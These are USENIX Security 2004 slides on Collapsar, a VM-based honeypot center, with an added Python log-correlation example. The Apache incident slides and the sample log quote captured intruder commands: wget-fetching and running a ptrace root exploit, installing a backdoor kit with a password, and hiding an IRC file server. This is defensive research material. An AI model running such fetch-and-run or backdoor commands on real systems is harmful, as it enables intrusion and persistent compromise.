Collapsar: A VM-Based Architecture for Network Attack Detention


USENIX Security 2004
Collapsar: A VM-Based Architecture for Network Attack Detention Center
Xuxian Jiang, Dongyan Xu
Department of Computer Sciences
Center for Education and Research in Information Assurance and Security (CERIAS)
Purdue University
Outline
- Motivation
- Collapsar architecture and features
- Collapsar design, implementation, and performance
- Collapsar deployment and real-world incidents
- Conclusion and on-going work
Motivation
- Need for network attack containment and monitoring
  - Worm outbreaks (MSBlaster, Sasser, ...)
  - Debian project servers hacked (Nov. 2003)
  - PlanetLab nodes compromised (Dec. 2003)
  - And more
Motivation
- Promise of honeypots
  - Providing insights into intruders' motivations, tactics, and tools
  - Highly concentrated datasets w/ low noise
  - Low false-positive and false-negative rates
  - Discovering unknown vulnerabilities/exploitations
    - Example: CERT advisory CA-2002-01 (Solaris CDE subprocess control daemon, dtspcd)
Current Honeypot Operation
- Individual honeypots
  - Limited local view of attacks
- Federation of distributed honeypots
  - Deploying honeypots in different networks
  - Exchanging logs and alerts
- Problems
  - Difficulties in distributed management
  - Lack of honeypot expertise
  - Inconsistency in security and management policies
    - Example: log format, sharing policy, exchange frequency
Our Solution: Collapsar
- Based on the HoneyFarm idea of Lance Spitzner
- Achieving two (seemingly) conflicting goals
  - Distributed honeypot presence
  - Centralized honeypot operation
- Key ideas
  - Leveraging unused IP addresses in each network
  - Diverting corresponding traffic to a "detention" center (transparently)
  - Creating VM-based honeypots in the center
Collapsar Architecture
[Architecture figure: an Attacker reaches several Production Networks, each running a Redirector; the Redirectors forward the traffic to the Collapsar Center, which consists of the Front-End, VM-based Honeypots, a Management Station, and a Correlation Engine]
Comparison with Current Approaches
- Overlay-based approach (e.g., NetBait, Domino overlay)
  - Honeypots deployed in different sites
  - Logs aggregated from distributed honeypots
  - Data mining performed on aggregated log information
  - Key difference: where the attacks take place (on-site vs. off-site)
Comparison with Current Approaches
- Sinkhole networking approach (e.g., iSink)
  - "Dark" space to monitor Internet abnormality and commotion (e.g., MSBlaster worms)
  - Limited interaction for better scalability
  - Key difference: contiguous large address blocks (vs. scattered addresses)
Comparison with Current Approaches
- Low-interaction approach (e.g., honeyd, iSink)
  - Highly scalable deployment
  - Low security risks
  - Key difference: emulated services (vs. real things)
    - Less effective at revealing unknown vulnerabilities
    - Less effective at capturing 0-day worms
Collapsar Design
- Functional components
  - Redirector
  - Collapsar Front-End
  - Virtual honeypots
- Assurance modules
  - Logging module
  - Tarpitting module
  - Correlation module
Functional Components
- Redirector
  - Running in each participating network
  - Capturing traffic toward unused IP addresses
  - Redirecting to Collapsar Front-End
  - Two implementation options
    - Proxy-ARP approach
      - Longer latency
      - Minimum change to network infrastructure
    - GRE (Generic Routing Encapsulation) approach
      - Lower latency
      - Requiring router re-configuration
      - Missing attack traffic from inside a domain
Functional Components
- Collapsar Front-End
  - Dispatching incoming traffic to different honeypots
    - Transparent bridging
  - Mitigating security risks
    - Transparent firewalling
    - Packet re-writing
  - Assurance module plug-in
    - Logging modules
    - Tarpitting modules
Functional Components
- Virtual honeypots
  - VM-based high-interaction honeypots
    - VMware
    - Enhanced User-Mode Linux (UML)
  - Commodity OS and popular services
    - Linux, Windows, Solaris, FreeBSD
    - Apache, Samba, sendmail, named
  - Capability of forensic analysis
    - System image snapshot / restoration
Assurance Modules
- Logging module
  - Traffic logging (e.g., tcpdump, snort)
    - Where: Front-End and honeypots
  - Keystroke logging (e.g., sebek)
    - Where: honeypots
- Tarpitting module
  - Mitigating security risks
  - Where: Front-End
- Correlation module
  - Mining and correlation (e.g., snort-inline)
Performance Measurement
- Measurement set-up
  [Set-up figure: traffic enters through the Redirector (Dell desktop PC, 1.8GHz Pentium 4/768MB memory) and reaches the Front-End (Dell PowerEdge server, 2.6GHz Xeon/2GB memory) in the Collapsar Center, where the honeypot runs under VMware or UML; the figure's endpoints are labelled H and A]
- Metrics
  - TCP throughput
    - Nock (http://www.cs.wisc.edu/~zandy/p/nock)
  - ICMP latency
Measurement Results
[Chart: TCP throughput]
Measurement Results
[Chart: ICMP latency]
Collapsar Deployment
- Deployed in a local environment for a two-month period in 2003
- Traffic redirected from five networks
  - Three wired LANs
  - One wireless LAN
  - One DSL network
- ~40 honeypots analyzed so far
  - Internet worms (MSBlaster, Enbiei, Nachi)
  - Interactive intrusions (Apache, Samba)
  - OS: Windows, Linux, Solaris, FreeBSD
Incident: Apache Honeypot/VMware
- Vulnerabilities
  - Vul 1: Apache (CERT® CA-2002-17)
  - Vul 2: Ptrace (CERT® VU-6288429)
- Time-line
  - Deployed: 23:44:03pm, 11/24/03
  - Compromised: 09:33:55am, 11/25/03
- Attack monitoring
  - Detailed log: http://www.cs.purdue.edu/homes/jiangx/collapsar
Incident: Apache Honeypot/VMware
1. Gaining a regular account: apache
[2003-11-25 09:33:55 aaa.bb.c.126 7817 sh 48]export HISTFILE=/dev/null; echo; echo ' >>>> GAME OVER! Hackerz Win ;) <<<<'; echo; echo; echo "****** I AM IN '`hostname -f`' ******"; echo; if [ -r /etc/redhat-release ]; then echo `cat /etc/redhat-release`; elif [ -r /etc/suse-release ]; then echo SuSe `cat /etc/suse-release`; elif [ -r /etc/slackware-version ]; then echo Slackware `cat /etc/slackware-version`; fi; uname -a; id; echo

2. Escalating to the root privilege
[2003-11-25 09:34:01 aaa.bb.c.126 7817 sh 48]cd /tmp
[2003-11-25 09:34:07 aaa.bb.c.126 7817 sh 48]wget http://xxxxxxxxxxxxxxxxxxxxx.xx/0304-exploits/ptrace-kmod.c;gcc ptrace-kmod.c -o p;./p

Incident: Apache Honeypot/VMware
3. Installing a set of backdoors
[2003-11-25 09:35:46 aaa.bb.c.126 7838 sh 0]wget http://xxxxxxx.xx.xx/vip/xxxxxx/shv4.tar.gz;tar -xzf shv4.tar.gz;cd shv4;./setup rooter 1985

4. Adding the ftp user and installing an IRC-based ftp server
[2003-11-25 09:36:16 aaa.bb.c.126 8009 xntps 0]SSH-1.5-PuTTYRelease-0.53b
[2003-11-25 09:36:57 aaa.bb.c.126 8009 xntps 0]cd /home;adduser ftpd;su ftpd
[2003-11-25 09:37:00 aaa.bb.c.126 8009 xntps 0]cd ftpd;mkdir .logs;cd .logs
[2003-11-25 09:37:04 aaa.bb.c.126 8009 xntps 0]wget http://xxxxxxx.xxx/archive/v1.2/iroffer1.2b22.tgz;tar -zvxf iroffer1.2b22.tgz;cd iroffer1.2b22;./Configure;make
[2003-11-25 09:37:50 aaa.bb.c.126 8009 xntps 0]mv iroffer syst
[2003-11-25 09:37:52 aaa.bb.c.126 8009 xntps 0]pico rpm
[2003-11-25 09:38:01 aaa.bb.c.126 8009 xntps 0]./syst -b rpm/dev/null &
Incident: Windows XP Honeypot/VMware
- Vulnerability
  - RPC DCOM Vul. (Microsoft Security Bulletin MS03-026)
- Time-line
  - Deployed: 22:10:00pm, 11/26/03
  - MSBlaster: 00:36:47am, 11/27/03
  - Enbiei: 01:48:57am, 11/27/03
  - Nachi: 07:03:55am, 11/27/03
Log Correlation: Stepping Stone
iii.jjj.kkk.11 compromised a honeypot and installed a rootkit, which contained an ssh backdoor.
xx.yyy.zzz.3 connected to the ssh backdoor using the same passwd.
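As an added example (not code from the paper or the Collapsar system), the detection and correlation a defender would run over sebek-style keystroke records in the layout shown on the Apache incident slides: it flags the uid 48 (apache) to uid 0 jump and links the host that installed the ssh backdoor with a second host that later logged in through it, as on the stepping-stone slide. The record layout, the constructed sample log and the treatment of the rootkit's `./setup` step as the backdoor install are assumptions.

```python
import re

# Record layout as shown on the incident slides (assumed, not a published sebek format):
# [date time source_ip pid process uid]command
LINE_RE = re.compile(r"^\[(\S+ \S+) (\S+) (\d+) (\S+) (\d+)\](.*)$")

# Constructed sample modelled on the Apache incident; URLs elided as on the slides.
SAMPLE_LOG = """\
[2003-11-25 09:33:55 aaa.bb.c.126 7817 sh 48]export HISTFILE=/dev/null; uname -a; id
[2003-11-25 09:34:07 aaa.bb.c.126 7817 sh 48]wget http://x.xx/ptrace-kmod.c;gcc ptrace-kmod.c -o p;./p
[2003-11-25 09:35:46 aaa.bb.c.126 7838 sh 0]wget http://x.xx/shv4.tar.gz;tar -xzf shv4.tar.gz;cd shv4;./setup rooter 1985
[2003-11-25 09:36:16 aaa.bb.c.126 8009 xntps 0]SSH-1.5-PuTTYRelease-0.53b
[2003-11-25 09:36:57 aaa.bb.c.126 8009 xntps 0]cd /home;adduser ftpd;su ftpd
[2003-11-25 10:02:10 xx.yyy.zzz.3 8231 xntps 0]SSH-1.5-PuTTYRelease-0.53b
"""

def parse(text):
    """Parse records into dicts; lines not matching the layout are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, ip, pid, proc, uid, cmd = m.groups()
            rows.append({"ts": ts, "ip": ip, "pid": int(pid), "proc": proc,
                         "uid": int(uid), "cmd": cmd.strip()})
    return rows

def find_escalations(rows):
    """Per source IP, the first command run as uid 0 after that IP was seen running
    commands as a non-root uid (the apache-to-root jump). Returns (ip, uid, ts)."""
    first_nonroot, reported, events = {}, set(), []
    for r in rows:
        if r["uid"] != 0:
            first_nonroot.setdefault(r["ip"], r["uid"])
        elif r["ip"] in first_nonroot and r["ip"] not in reported:
            reported.add(r["ip"])
            events.append((r["ip"], first_nonroot[r["ip"]], r["ts"]))
    return events

def find_stepping_stones(rows):
    """Link the host that ran the rootkit's './setup' (assumed backdoor install) with
    other hosts whose session begins with an SSH client banner, i.e. backdoor logins."""
    installers = {r["ip"] for r in rows if "./setup" in r["cmd"]}
    logins = {r["ip"] for r in rows if r["cmd"].startswith("SSH-")}
    return sorted(logins - installers), sorted(installers)

if __name__ == "__main__":
    rows = parse(SAMPLE_LOG)
    print(find_escalations(rows), find_stepping_stones(rows))
```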
Log Correlation: Network Scanning
Conclusions
- A new architecture for attack containment and monitoring
  - Distributed presence and centralized operation of honeypots
  - Good potential in attack correlation and log mining
- Unique features
  - Aggregation of scattered unused IP addresses
  - Off-site (relative to participating networks) attack occurrences and monitoring
  - Real services for unknown vulnerability revelation
On-going Work
- Integration into trusted server architectures (SODA and Poly2)
- On-demand honeypot customization
- Collapsar center federation
- Scalability
- Testbed for worm containment (coming soon)
Thank you.
For more information:
Email: {dxu, jiangx}@cs.purdue.edu
URL: www.cs.purdue.edu/~dxu
Google: “Purdue Collapsar friends”